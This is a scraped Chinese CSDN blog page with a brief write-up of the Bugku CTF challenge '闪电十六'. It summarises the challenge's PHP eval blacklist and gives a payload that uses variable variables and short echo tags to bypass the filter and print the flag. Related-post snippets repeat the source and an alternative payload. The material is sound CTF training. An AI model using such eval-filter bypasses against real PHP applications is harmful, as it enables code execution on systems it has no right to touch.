[bugku]-闪电十六鞭

最新推荐文章于 2024-03-31 20:22:27 发布
最新推荐文章于 2024-03-31 20:22:27 发布
阅读量680 收藏
点赞数
分类专栏: CTF题目笔记 文章标签: sql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52116519/article/details/123857531
版权

在这里插入图片描述

==============================简化源码==============================

1、strlen($_GET['flag']) != strlen($exam)   flag变量长度为49
2、flag过滤了  '/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is'
3、(eval($_GET['flag']) === sha1($flag)) 

原理  
eval(<?php echo $flag;?>)

payload
?flag=$a='fla1';$a{3}='g';?><?=$$a;?>111111111111111111

分析
<?php echo $flag;?>  --》》 <?=$flag;?>  --》》 $a=flag  --》》 <?=$$a;?>  --》》$a='fla1';$a{3}='g';
c4fx
关注
专栏目录
Bugku CTF 每日一题 闪电十六
彼岸花苏陌的博客
01-16 1090
闪电十六 点开发现出现源码 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } else if (strlen
BugKu-web---程序员本地网站
MIGENGKING的博客
04-13 747
打开链接: 题目提示“本地访问!”,和“localhost”’ 因此用burpsuite抓包加上加上:X-Forwarded-For: 127.0.0.1 首先: X-Forwarded-For: 简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。 接着: 127.0.0.1是回送地址,指本地...
bugku-闪电十六
小诺言的博客
04-05 1558
闪电十六
Bugku 闪电十六
m0_63253040的博客
03-11 924
进入环境,是一串php代码 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } else if (strlen
BugKu——闪电十六
qq_52051736的博客
03-08 601
打开题目链接 是一段php代码,应该是代码审计问题,首先分析源码 目标是输出flag变量,所以flag就在flag变量里面 输出条件有三个 flag变量长度等于$exam的长度,长度为49 flag变量不能包含` , “ , . , \ , ( , ) , [ , ] , _ , flag , echo , print , require , include , die , exit ; eval($_GET[‘flag’]) === sha1($flag) 前面两个条件好绕过,就是第三
二十八、bugku 闪电十六
山兔的博客
09-05 569
php字符对照 &quot=" <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } else if (strl
[Bugku-AWD专版]一款用于AWD比赛中的自动化攻击框架.zip
09-30
Bugku-AWD专版】是一款专为AWD(Attack With Defense)比赛设计的自动化攻击框架,它旨在帮助参赛者更高效地进行攻防对抗。这个框架的核心目标是简化比赛过程中对目标系统的攻击策略和自动化执行,使得参赛者能够...
Bugku-AWD专版用于AWD比赛中的自动化攻击框架源码+项目说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习...Bugku-AWD专版用于AWD比赛中的自动化攻击框架源码+项目说明.zip
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
闪电十六
qq_48511129的博客
01-27 794
这题主要考察分析php代码能力,分析代码构造url,进行过滤 http://114.67.246.176:18660/?flag=a=′fla∗′;a='fla*';a=′fla∗′;a{3}=‘g’;?>11111111111111111;<?=$$a;?>得到flag
BugKu_闪电十六
Kobalos的博客
08-17 1046
访问目标地址 发现了一段php代码,又是代码审计的问题 分析代码 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } .
bugku web 闪电十六
最新发布
l181954187的博客
03-31 440
肯定后面是要补全的,
bugku ctf 闪电十六 <?= ?> 短标签
YouthBelief的博客
03-08 470
0x00 解题须知 在php中 <? ?>和<?= ?>是短标签 而<?php ?>是长标签 其中<?= 是代替 <? echo的 <? ?>代替的是<?php ?> php.ini文件 可以配置php 是否可以解析短标签 0x01 解题 1.1 分析代码 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.s
bugkuctf
Vinson的博客
10-16 331
目录 web3 域名解析 你必须让他停下 变量1 网站被黑 web3 不断跳出弹框,用firefox可阻止,chrome没找到,查看源代码 百度查出是Html特殊字符,在Html页面里可输出 域名解析 听说把 flag.baidu.com 解析到123.206.87.240 就能拿到flag C:\Windows\System32\drivers\etc找到hos...
bugku ctf 杂项 闪的好快 writeup
sx234com的博客
01-25 1382
访问图片 发现确实闪的很快,想了一下应该可以用photoshop去解决。 不过我想了个其他思路。 将闪动的二维码录成视频,使用的是录屏大师录好以后 保存为avi视频。 然后使用360自带的快剪辑进行编辑。 编辑界面如下 现在就好办了。挨个扫描就出来了。  应该解决的方法有很多,找一种自己熟练使用的软件就可以。 扫描二维码的过程记录。 顺利截取到想要的东西。...
bugku web篇(二)
weixin_51387754的博客
08-29 560
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。...
Bugku解题 web 【四】
weixin_46703850的博客
04-04 1667
Bugku解题 web28.web1929.聪明的php 介绍:记录解题过程
BugKuCTF中套路满满的题--------getshell
qq_42133828的博客
12-19 951
这道题目是一个关于文件上传的题目, 而他的绕过机制是黑名单检测和类型检测 黑名单检测:使用php5绕过,其他的(php3,phtml,php4.。。)都绕不过 类型检测:抓包,改参数filename:2.php5  ,有两个Content-Type,先改第二个的Content-Type:image/jpeg  ,再改第一个的Content-Type:Multipart/form-data; ...
bugku chatgpt-1
10-09
ChatGPT是一种由OpenAI训练的大型语言模型。它的原理是基于Transformer架构,通过预训练大量文本数据来学习如何生成人类可读的文本,然后通过接受输入并生成输出来实现对话。 ChatGPT的用途非常广泛,可以用于自然...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值